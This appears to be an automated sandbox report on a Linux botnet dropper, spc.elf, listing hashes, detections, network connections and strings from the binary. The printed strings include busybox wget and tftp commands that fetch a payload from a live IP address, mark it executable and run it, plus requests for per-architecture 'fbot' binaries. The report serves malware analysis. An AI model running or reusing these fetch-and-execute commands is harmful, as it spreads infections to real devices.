Linux Analysis Report
spc.elf

Overview

General Information

Sample name: spc.elf
Analysis ID: 1559717
MD5: 264db8cf89331a2fa5e0f5101d55f77e
SHA1: a565ebfa05ca2058b467dfb02239f855ba1e5c80
SHA256: 8f2b384966ba35c669945237d7d2e7ff1f2d314268adc43743d4fe569a7f997b
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 48
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

barindex
Source: spc.elf ReversingLabs: Detection: 39%
Source: global traffic TCP traffic: 192.168.2.23:45598 -> 85.239.34.134:7685
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: spc.elf String found in binary or memory: Cdh5GZtVWYhl2cuFGdz9mLsNWdAIiZh5GZtVWYhl2cuFGdz9mLsNWdAI2Zz9Ca0BGa0FGI0lWYpxWYg4mZtFWa5xGI0FHIoRSZuBXZ0hHIhRmYlxHI1NmcgUXagMXcpVXZAQhttps://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789unknown./. equals www.youtube.com (Youtube)
Source: spc.elf String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY equals www.youtube.com (Youtube)
Source: spc.elf String found in binary or memory: http://87.120.116.226
Source: spc.elf String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY
Source: spc.elf String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZ
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sample String containing 'busybox' found: /bin/busybox TSUNAMI
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample String containing 'busybox' found: /bin/busybox KSLAKW; /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo
Source: Initial sample String containing 'busybox' found: pdlbwairmoheqc18k5fgstv4jn072u63\x%02x/tmp//var//var/run//dev/arm5arm72bpdgbAAgOAA2cyVmbtFQZAAndkJndAMXYzN2dy9AZAA2YvNWd05iOhBHcsBXZgQmb09GIvZWdk5gPAAAJAAwIAAnYzVWevJAeAAXbsVGdtk2YsFAbAAGasVAcAAmbvNnclJ3YAQnbhZGbklWYslWZAQWZp5WZAQncvJgcAA2bk9nYllmYkFURGx2dldDdgoXYwBGb0VGIv5CdmB3buVAZAAGd0ZDcgoXYwBGb0VGIv5CdmB3buVAZAAURIN0TPRkTAUenablesystemshellshlinuxshell/bin/busybox TSUNAMI/bin/busybox cat /bin/busybox
Source: Initial sample String containing 'busybox' found: >t && cd && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: -O -> .t; /bin/busybox chmod 777 .t; ./.t
Source: Initial sample String containing 'busybox' found: /bin/busybox tftp -r
Source: Initial sample String containing 'busybox' found: ; /bin/busybox chmod 777 .t; ./.t
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -en '
Source: Initial sample String containing 'busybox' found: retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample String containing 'busybox' found: ELFarmsparci686m68kpowerpcsuperhx86_64mipselmips/bin/busybox wget http://87.120.116.226 -O -> .t; /bin/busybox chmod 777 .t; ./.t/bin/busybox tftp -r -l .t -g ; /bin/busybox chmod 777 .t; ./.t/bin/busybox echo -en '' >> retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'./retrieve > .t && ./.t; >retrieve && >.t
Source: Initial sample Potential command found: GET /fbot.arm5 HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.arm7 HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.x86 HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.mips HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.mipsel HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.powerpc HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.sparc HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.sh4 HTTP/1.0
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal48.linELF@0/0@0/0
Source: /usr/bin/dash (PID: 6222) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Alc5Eqx4Lp /tmp/tmp.LMNRnu9usF /tmp/tmp.qdWjTjRFP6 Jump to behavior
Source: /usr/bin/dash (PID: 6223) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Alc5Eqx4Lp /tmp/tmp.LMNRnu9usF /tmp/tmp.qdWjTjRFP6 Jump to behavior
Source: /tmp/spc.elf (PID: 6237) Queries kernel information via 'uname': Jump to behavior
Source: spc.elf, 6237.1.0000558398d97000.0000558398dfc000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/sparc
Source: spc.elf, 6237.1.0000558398d97000.0000558398dfc000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/sparc
Source: spc.elf, 6237.1.00007ffc32767000.00007ffc32788000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-sparc/tmp/spc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/spc.elf
Source: spc.elf, 6237.1.00007ffc32767000.00007ffc32788000.rw-.sdmp Binary or memory string: /usr/bin/qemu-sparc
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs